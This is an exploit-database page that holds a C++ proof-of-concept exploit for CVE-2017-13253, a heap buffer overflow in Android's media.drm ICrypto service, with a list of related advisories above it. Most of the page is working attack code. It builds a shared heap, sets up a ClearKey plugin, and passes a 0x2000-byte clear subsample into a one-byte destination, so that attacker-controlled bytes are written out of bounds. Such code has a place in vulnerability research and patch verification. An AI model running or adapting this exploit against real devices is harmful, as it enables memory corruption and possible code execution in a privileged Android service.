Android DRM Services - Buffer Overflow Exploit

🗓️ 16 Mar 2018 00:00:00Reported by Tamir Zahavi-BrunnerType

zdt🔗 0day.today👁 52 Views

Android DRM Buffer Overflow Exploit using ICrypt

Reporter	Title	Published	Views	Family All 10
Android Security Bulletins	Android Security Bulletin—March 2018Stay organized with collectionsSave and categorize content based on your preferences.	5 Mar 201800:00	–	androidsecurity
Circl	CVE-2017-13253	18 Mar 201813:51	–	circl
CNVD	Google Android Media framework remote code execution vulnerability (CNVD-2018-06662)	7 Mar 201800:00	–	cnvd
CVE	CVE-2017-13253	4 Apr 201817:00	–	cve
Cvelist	CVE-2017-13253	4 Apr 201817:00	–	cvelist
EUVD	EUVD-2017-4770	7 Oct 202500:30	–	euvd
NVD	CVE-2017-13253	4 Apr 201817:29	–	nvd
OSV	CVE-2017-13253	4 Apr 201817:29	–	osv
Packet Storm	Android DRM Services Buffer Overflow	15 Mar 201800:00	–	packetstorm
Prion	Out-of-bounds	4 Apr 201817:29	–	prion

#include <utils/StrongPointer.h>
#include <binder/IServiceManager.h>
#include <binder/MemoryHeapBase.h>
#include <binder/MemoryBase.h>
#include <binder/IMemory.h>
#include <media/ICrypto.h>
#include <media/IMediaDrmService.h>
#include <media/hardware/CryptoAPI.h>
 
#include <stdio.h>
#include <unistd.h>
 
using namespace android;
 
static sp<ICrypto> getCrypto()
{
    sp<IServiceManager> sm = defaultServiceManager();
    sp<IBinder> binder = sm->getService(String16("media.drm"));
    sp<IMediaDrmService> service = interface_cast<IMediaDrmService>(binder);
    if (service == NULL) {
        fprintf(stderr, "Failed to retrieve 'media.drm' service.\n");
        return NULL;
    }
    sp<ICrypto> crypto = service->makeCrypto();
    if (crypto == NULL) {
        fprintf(stderr, "makeCrypto failed.\n");
        return NULL;
    }
    return crypto;
}
 
static bool setClearKey(sp<ICrypto> crypto)
{
    // A UUID which identifies the ClearKey DRM scheme.
    const uint8_t clearkey_uuid[16] = {
        0x10, 0x77, 0xEF, 0xEC, 0xC0, 0xB2, 0x4D, 0x02,
        0xAC, 0xE3, 0x3C, 0x1E, 0x52, 0xE2, 0xFB, 0x4B
    };
    if (crypto->createPlugin(clearkey_uuid, NULL, 0) != OK) {
        fprintf(stderr, "createPlugin failed.\n");
        return false;
    }
    return true;
}
 
#define DATA_SIZE (0x2000)
#define DEST_OFFSET (1)
 
static void executeOverflow()
{
    // Get an interface to a remote CryptoHal object.
    sp<ICrypto> crypto = getCrypto();
    if (crypto == NULL) {
        return;
    }
 
    if (!setClearKey(crypto)) {
        return;
    }
 
    // From here we're done with the preparations and go into the
    // vulnerability PoC.
 
    sp<MemoryHeapBase> heap = new MemoryHeapBase(DATA_SIZE);
    // This line is to merely show that we have full control over the data
    // written in the overflow.
    memset(heap->getBase(), 'A', DATA_SIZE);
    sp<MemoryBase> sourceMemory = new MemoryBase(heap, 0, DATA_SIZE);
    sp<MemoryBase> destMemory = new MemoryBase(heap, DATA_SIZE - DEST_OFFSET,
        DEST_OFFSET);
    int heapSeqNum = crypto->setHeap(heap);
    if (heapSeqNum < 0) {
        fprintf(stderr, "setHeap failed.\n");
        return;
    }
 
    CryptoPlugin::Pattern pattern = { .mEncryptBlocks = 0, .mSkipBlocks = 1 };
    ICrypto::SourceBuffer source = { .mSharedMemory = sourceMemory,
        .mHeapSeqNum = heapSeqNum };
    // mNumBytesOfClearData is the actual size of data to be copied.
    CryptoPlugin::SubSample subSamples[] = { {
        .mNumBytesOfClearData = DATA_SIZE, .mNumBytesOfEncryptedData = 0 } };
    ICrypto::DestinationBuffer destination = {
        .mType = ICrypto::kDestinationTypeSharedMemory, .mHandle = NULL,
        .mSharedMemory = destMemory };
 
    printf("decrypt result = %zd\n", crypto->decrypt(NULL, NULL,
        CryptoPlugin::kMode_Unencrypted, pattern, source, 0, subSamples,
        ARRAY_SIZE(subSamples), destination, NULL));
}
 
int main() {
    executeOverflow();
    return 0;
}

#  0day.today [2018-04-01]  #

16 Mar 2018 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.04218